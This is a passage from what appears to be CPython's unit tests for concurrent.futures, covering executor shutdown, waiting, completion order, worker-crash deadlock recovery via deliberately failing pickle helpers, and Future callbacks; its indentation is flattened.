rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
def test_cancel_futures(self):
assert self.worker_count <= 5, "test needs few workers"
fs = [self.executor.submit(time.sleep, .1) for _ in range(50)]
self.executor.shutdown(cancel_futures=True)
# We can't guarantee the exact number of cancellations, but we can
# guarantee that *some* were cancelled. With few workers, many of
# the submitted futures should have been cancelled.
cancelled = [fut for fut in fs if fut.cancelled()]
self.assertGreater(len(cancelled), 20)
# Ensure the other futures were able to finish.
# Use "not fut.cancelled()" instead of "fut.done()" to include futures
# that may have been left in a pending state.
others = [fut for fut in fs if not fut.cancelled()]
for fut in others:
self.assertTrue(fut.done(), msg=f"{fut._state=}")
self.assertIsNone(fut.exception())
# Similar to the number of cancelled futures, we can't guarantee the
# exact number that completed. But, we can guarantee that at least
# one finished.
self.assertGreater(len(others), 0)
def test_hang_gh83386(self):
"""shutdown(wait=False) doesn't hang at exit with running futures.
See https://github.com/python/cpython/issues/83386.
"""
if self.executor_type == futures.ProcessPoolExecutor:
raise unittest.SkipTest(
"Hangs, see https://github.com/python/cpython/issues/83386")
rc, out, err = assert_python_ok('-c', """if True:
from concurrent.futures import {executor_type}
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
if {context!r}: multiprocessing.set_start_method({context!r})
t = {executor_type}(max_workers=3)
t.submit(sleep_and_print, 1.0, "apple")
t.shutdown(wait=False)
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, 'ctx', None)))
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
res = executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
# Make sure the results were all computed before the
# executor got shutdown.
assert all([r == abs(v) for r, v in zip(res, range(-5, 5))])
def test_shutdown_no_wait(self):
# Ensure that the executor cleans up the threads when calling
# shutdown with wait=False
executor = futures.ThreadPoolExecutor(max_workers=5)
res = executor.map(abs, range(-5, 5))
threads = executor._threads
executor.shutdown(wait=False)
for t in threads:
t.join()
# Make sure the results were all computed before the
# executor got shutdown.
assert all([r == abs(v) for r, v in zip(res, range(-5, 5))])
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
support.gc_collect() # For PyPy or other GCs.
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
support.gc_collect() # For PyPy or other GCs.
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
def test_cancel_futures_wait_false(self):
# Can only be reliably tested for TPE, since PPE often hangs with
# `wait=False` (even without *cancel_futures*).
rc, out, err = assert_python_ok('-c', """if True:
from concurrent.futures import ThreadPoolExecutor
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
t = ThreadPoolExecutor()
t.submit(sleep_and_print, .1, "apple")
t.shutdown(wait=False, cancel_futures=True)
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def test_processes_terminate(self):
def acquire_lock(lock):
lock.acquire()
mp_context = self.get_context()
if mp_context.get_start_method(allow_none=False) == "fork":
# fork pre-spawns, not on demand.
expected_num_processes = self.worker_count
else:
expected_num_processes = 3
sem = mp_context.Semaphore(0)
for _ in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._processes), expected_num_processes)
for _ in range(3):
sem.release()
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(
max_workers=5, mp_context=self.get_context()) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(
max_workers=5, mp_context=self.get_context())
res = executor.map(abs, range(-5, 5))
executor_manager_thread = executor._executor_manager_thread
processes = executor._processes
call_queue = executor._call_queue
executor_manager_thread = executor._executor_manager_thread
del executor
support.gc_collect() # For PyPy or other GCs.
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
executor_manager_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
# Make sure the results were all computed before the
# executor got shutdown.
assert all([r == abs(v) for r, v in zip(res, range(-5, 5))])
def test_shutdown_no_wait(self):
# Ensure that the executor cleans up the processes when calling
# shutdown with wait=False
executor = futures.ProcessPoolExecutor(
max_workers=5, mp_context=self.get_context())
res = executor.map(abs, range(-5, 5))
processes = executor._processes
call_queue = executor._call_queue
executor_manager_thread = executor._executor_manager_thread
executor.shutdown(wait=False)
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
executor_manager_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
# Make sure the results were all computed before the executor got
# shutdown.
assert all([r == abs(v) for r, v in zip(res, range(-5, 5))])
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_20369(self):
# See https://bugs.python.org/issue20369
future = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait([future, future],
return_when=futures.ALL_COMPLETED)
self.assertEqual({future}, done)
self.assertEqual(set(), not_done)
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
support.gc_collect() # For PyPy or other GCs.
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
support.gc_collect() # For PyPy or other GCs.
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertRaises(TypeError):
self.executor.submit(fn=capture, arg=1)
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
support.gc_collect() # For PyPy or other GCs.
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
@unittest.skipUnless(hasattr(os, 'register_at_fork'), 'need os.register_at_fork')
def test_hang_global_shutdown_lock(self):
# bpo-45021: _global_shutdown_lock should be reinitialized in the child
# process, otherwise it will never exit
def submit(pool):
pool.submit(submit, pool)
with futures.ThreadPoolExecutor(1) as pool:
pool.submit(submit, pool)
for _ in range(50):
with futures.ProcessPoolExecutor(1, mp_context=mp.get_context('fork')) as workers:
workers.submit(tuple)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
@hashlib_helper.requires_hashdigest('md5')
def test_ressources_gced_in_workers(self):
# Ensure that argument for a job are correctly gc-ed after the job
# is finished
mgr = self.get_context().Manager()
obj = EventfulGCObj(mgr)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
# explicitly destroy the object to ensure that EventfulGCObj.__del__()
# is called while manager is still running.
obj = None
support.gc_collect()
mgr.shutdown()
mgr.join()
def test_saturation(self):
executor = self.executor
mp_context = self.get_context()
sem = mp_context.Semaphore(0)
job_count = 15 * executor._max_workers
for _ in range(job_count):
executor.submit(sem.acquire)
self.assertEqual(len(executor._processes), executor._max_workers)
for _ in range(job_count):
sem.release()
def test_idle_process_reuse_one(self):
executor = self.executor
assert executor._max_workers >= 4
if self.get_context().get_start_method(allow_none=False) == "fork":
raise unittest.SkipTest("Incompatible with the fork start method.")
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._processes), 1)
def test_idle_process_reuse_multiple(self):
executor = self.executor
assert executor._max_workers <= 5
if self.get_context().get_start_method(allow_none=False) == "fork":
raise unittest.SkipTest("Incompatible with the fork start method.")
executor.submit(mul, 12, 7).result()
executor.submit(mul, 33, 25)
executor.submit(mul, 25, 26).result()
executor.submit(mul, 18, 29)
executor.submit(mul, 1, 2).result()
executor.submit(mul, 0, 9)
self.assertLessEqual(len(executor._processes), 3)
executor.shutdown()
def test_max_tasks_per_child(self):
context = self.get_context()
if context.get_start_method(allow_none=False) == "fork":
with self.assertRaises(ValueError):
self.executor_type(1, mp_context=context, max_tasks_per_child=3)
return
# not using self.executor as we need to control construction.
# arguably this could go in another class w/o that mixin.
executor = self.executor_type(
1, mp_context=context, max_tasks_per_child=3)
f1 = executor.submit(os.getpid)
original_pid = f1.result()
# The worker pid remains the same as the worker could be reused
f2 = executor.submit(os.getpid)
self.assertEqual(f2.result(), original_pid)
self.assertEqual(len(executor._processes), 1)
f3 = executor.submit(os.getpid)
self.assertEqual(f3.result(), original_pid)
# A new worker is spawned, with a statistically different pid,
# while the previous was reaped.
f4 = executor.submit(os.getpid)
new_pid = f4.result()
self.assertNotEqual(original_pid, new_pid)
self.assertEqual(len(executor._processes), 1)
executor.shutdown()
def test_max_tasks_per_child_defaults_to_spawn_context(self):
# not using self.executor as we need to control construction.
# arguably this could go in another class w/o that mixin.
executor = self.executor_type(1, max_tasks_per_child=3)
self.assertEqual(executor._mp_context.get_start_method(), "spawn")
def test_max_tasks_early_shutdown(self):
context = self.get_context()
if context.get_start_method(allow_none=False) == "fork":
raise unittest.SkipTest("Incompatible with the fork start method.")
# not using self.executor as we need to control construction.
# arguably this could go in another class w/o that mixin.
executor = self.executor_type(
3, mp_context=context, max_tasks_per_child=1)
futures = []
for i in range(6):
futures.append(executor.submit(mul, i, i))
executor.shutdown()
for i, future in enumerate(futures):
self.assertEqual(future.result(), mul(i, i))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
raise Err()
def _raise_error_ignore_stderr(Err):
"""Function that raises an Exception in process and ignores stderr."""
import io
sys.stderr = io.StringIO()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error_ignore_stderr, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = support.SHORT_TIMEOUT
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
# composants.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
# This should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def _check_crash(self, error, func, *args, ignore_stderr=False):
# test for deadlock caused by crashes in a pool
self.executor.shutdown(wait=True)
executor = self.executor_type(
max_workers=2, mp_context=self.get_context())
res = executor.submit(func, *args)
if ignore_stderr:
cm = support.captured_stderr()
else:
cm = contextlib.nullcontext()
try:
with self.assertRaises(error):
with cm:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_error_at_task_pickle(self):
# Check problem occurring while pickling a task in
# the task_handler thread
self._check_crash(PicklingError, id, ErrorAtPickle())
def test_exit_at_task_unpickle(self):
# Check problem occurring while unpickling a task on workers
self._check_crash(BrokenProcessPool, id, ExitAtUnpickle())
def test_error_at_task_unpickle(self):
# Check problem occurring while unpickling a task on workers
self._check_crash(BrokenProcessPool, id, ErrorAtUnpickle())
def test_crash_at_task_unpickle(self):
# Check problem occurring while unpickling a task on workers
self._check_crash(BrokenProcessPool, id, CrashAtUnpickle())
def test_crash_during_func_exec_on_worker(self):
# Check problem occurring during func execution on workers
self._check_crash(BrokenProcessPool, _crash)
def test_exit_during_func_exec_on_worker(self):
# Check problem occurring during func execution on workers
self._check_crash(SystemExit, _exit)
def test_error_during_func_exec_on_worker(self):
# Check problem occurring during func execution on workers
self._check_crash(RuntimeError, _raise_error, RuntimeError)
def test_crash_during_result_pickle_on_worker(self):
# Check problem occurring while pickling a task result
# on workers
self._check_crash(BrokenProcessPool, _return_instance, CrashAtPickle)
def test_exit_during_result_pickle_on_worker(self):
# Check problem occurring while pickling a task result
# on workers
self._check_crash(SystemExit, _return_instance, ExitAtPickle)
def test_error_during_result_pickle_on_worker(self):
# Check problem occurring while pickling a task result
# on workers
self._check_crash(PicklingError, _return_instance, ErrorAtPickle)
def test_error_during_result_unpickle_in_result_handler(self):
# Check problem occurring while unpickling a task in
# the result_handler thread
self._check_crash(BrokenProcessPool,
_return_instance, ErrorAtUnpickle,
ignore_stderr=True)
def test_exit_during_result_unpickle_in_result_handler(self):
# Check problem occurring while unpickling a task in
# the result_handler thread
self._check_crash(BrokenProcessPool, _return_instance, ExitAtUnpickle)
def test_shutdown_deadlock(self):
# Test that the pool calling shutdown do not cause deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=self.get_context()) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
def test_shutdown_deadlock_pickle(self):
# Test that the pool calling shutdown with wait=False does not cause
# a deadlock if a task fails at pickle after the shutdown call.
# Reported in bpo-39104.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=self.get_context()) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
# Start the executor and get the executor_manager_thread to collect
# the threads and avoid dangling thread that should be cleaned up
# asynchronously.
executor.submit(id, 42).result()
executor_manager = executor._executor_manager_thread
# Submit a task that fails at pickle and shutdown the executor
# without waiting
f = executor.submit(id, ErrorAtPickle())
executor.shutdown(wait=False)
with self.assertRaises(PicklingError):
f.result()
# Make sure the executor is eventually shutdown and do not leave
# dangling threads
executor_manager.join()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
